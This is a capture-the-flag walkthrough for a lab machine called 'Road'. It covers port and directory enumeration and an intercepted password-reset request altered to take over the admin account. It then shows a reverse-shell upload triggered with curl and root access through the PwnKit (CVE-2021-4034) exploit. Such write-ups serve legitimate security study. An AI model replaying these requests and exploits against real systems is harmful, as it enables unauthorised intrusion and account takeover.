CTF : Road
Informations
- IP: 10.10.112.242
- MYIP: 10.9.85.5
First enumeration
Basics
- NMAP
console$ sudo nmap -p22,80 -A 10.10.112.242 Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-07 21:32 CEST Nmap scan report for 10.10.112.242 Host is up (0.036s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 e6:dc:88:69:de:a1:73:8e:84:5b:a1:3e:27:9f:07:24 (RSA) | 256 6b:ea:18:5d:8d:c7:9e:9a:01:2c:dd:50:c5:f8:c8:05 (ECDSA) |_ 256 ef:06:d7:e4:b1:65:15:6e:94:62:cc:dd:f0:8a:1a:24 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-title: Sky Couriers |_http-server-header: Apache/2.4.41 (Ubuntu) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (92%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.9 (92%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 22/tcp) HOP RTT ADDRESS 1 36.49 ms 10.9.0.1 2 36.50 ms 10.10.112.242 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 14.09 seconds
console$ gobuster dir -f -r -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.112.242/v2/ -x cgi,html,txt,js,php,php.bak,bak,zip,sql,sql.bak,tgz,tar.gz,bkp,tar,rar,id_rsa,log,xml,json,sh,py,pl,rb,csv,pub,jar =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.112.242/v2/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Extensions: zip,sql.bak,tgz,log,py,pub,php.bak,bak,tar.gz,tar,id_rsa,sh,pl,rb,cgi,jar,js,php,sql,bkp,rar,xml,csv,html,json,txt [+] Add Slash: true [+] Follow Redirect: true [+] Timeout: 10s =============================================================== 2022/07/07 22:13:32 Starting gobuster in directory enumeration mode =============================================================== /index.php (Status: 200) [Size: 2619] /profile.php (Status: 200) [Size: 2619] /admin/ (Status: 200) [Size: 32] /lostpassword.php (Status: 200) [Size: 22]
consolegobuster dir -f -r -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.112.242/v2/admin/ -x cgi,html,txt,js,php,php.bak,bak,zip,sql,sql.bak,tgz,tar.gz,bkp,tar,rar,id_rsa,log,xml,json,sh,py,pl,rb,csv,pub,jar =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.112.242/v2/admin/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Extensions: html,php.bak,sql.bak,bkp,pub,txt,bak,zip,tgz,tar,pl,rb,js,sql,tar.gz,rar,id_rsa,log,csv,jar,cgi,php,xml,json,sh,py [+] Add Slash: true [+] Follow Redirect: true [+] Timeout: 10s =============================================================== 2022/07/07 22:26:55 Starting gobuster in directory enumeration mode =============================================================== /index.php (Status: 200) [Size: 32] /login.html (Status: 200) [Size: 2619] /register.html (Status: 200) [Size: 3798] /reg.php (Status: 200) [Size: 28] /logout.php (Status: 200) [Size: 2619] Progress: 191484 / 5955147 (3.22%) ^C [!] Keyboard interrupt detected, terminating. =============================================================== 2022/07/07 22:39:45 Finished ===============================================================
Vulnerabilities search
console$ nikto -host 10.10.112.242 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.112.242 + Target Hostname: 10.10.112.242 + Target Port: 80 + Start Time: 2022-07-07 22:02:21 (GMT2) --------------------------------------------------------------------------- + Server: Apache/2.4.41 (Ubuntu) + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + Server may leak inodes via ETags, header found with file /, inode: 4c97, size: 5ce886fbdbcdf, mtime: gzip + Allowed HTTP Methods: POST, OPTIONS, HEAD, GET + OSVDB-3092: /phpMyAdmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts. + Uncommon header 'x-ob_mode' found, with contents: 1 + /phpMyAdmin/: phpMyAdmin directory found + OSVDB-3092: /phpMyAdmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts. + 7892 requests: 0 error(s) and 9 item(s) reported on remote host + End Time: 2022-07-07 22:08:40 (GMT2) (379 seconds) --------------------------------------------------------------------------- + 1 host(s) tested ********************************************************************* Portions of the server's headers (Apache/2.4.41) are not in the Nikto 2.1.6 database or are newer than the known string. Would you like to submit this information (*no server specific data*) to CIRT.net for a Nikto update (or you may email to sullo@cirt.net) (y/n)? n
Exploit
First I tried to login into the web interface :
http://10.10.112.242/v2/admin/login.html
But I don't know any user... Thanksfully we can create a new via register button.
Then I entered the newly created creds and sign in.
Now there is two pages that should be interesing :
- The edit profile page
http://10.10.112.242/v2/profile.php
On this page we learn that only the admin can change profile options and it let us know the admin login : admin@sky.thm
- The reset user page
http://10.10.112.242/v2/ResetUser.php
It permits to change the current user password but if we intercept it with burp we can change the username ;)
POST /v2/lostpassword.php HTTP/1.1
Host: 10.10.112.242
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: fr,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------18730205262181738328290571262
Content-Length: 644
Origin: http://10.10.112.242
Connection: close
Referer: http://10.10.112.242/v2/ResetUser.php
Cookie: PHPSESSID=9re8h3a99ke3afk90g6q9ma4vg; Bookings=0; Manifest=0; Pickup=0; Delivered=0; Delay=0; CODINR=0; POD=0; cu=0
Upgrade-Insecure-Requests: 1
-----------------------------18730205262181738328290571262
Content-Disposition: form-data; name="uname"
admin@sky.thm
-----------------------------18730205262181738328290571262
Content-Disposition: form-data; name="npass"
toto
-----------------------------18730205262181738328290571262
Content-Disposition: form-data; name="cpass"
toto
-----------------------------18730205262181738328290571262
Content-Disposition: form-data; name="ci_csrf_token"
-----------------------------18730205262181738328290571262
Content-Disposition: form-data; name="send"
Submit
-----------------------------18730205262181738328290571262--And now we got the admin creds :)
Now I can use the profile image upload to upload a reverse shell.
Now in the page source code there is a clue :
html<!-- /v2/profileimages/ -->
Launch a pwncat and then :
consolecurl http://10.10.112.242/v2/profileimages/shell.php
And we got shell :)
console$ cd /home/webdeveloper $ cat user.txt
Privilege escalation
Enumeration for privesc
console$ lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 20.04.2 LTS Release: 20.04 Codename: focal $ uname -a Linux sky 5.4.0-73-generic #82-Ubuntu SMP Wed Apr 14 17:39:42 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
console$ find / -user root -perm -4000 2>/dev/null [...] /usr/bin/pkexec [...]
As this is an old enough OS, we can try pwnkit.
Using pwncat I uploaded the python exploit for pwnkit.
Exploit
console$ python3 CVE-2021-4034.py [+] Creating shared library for exploit code. [+] Calling execve() # cat /root/root.txt
\o/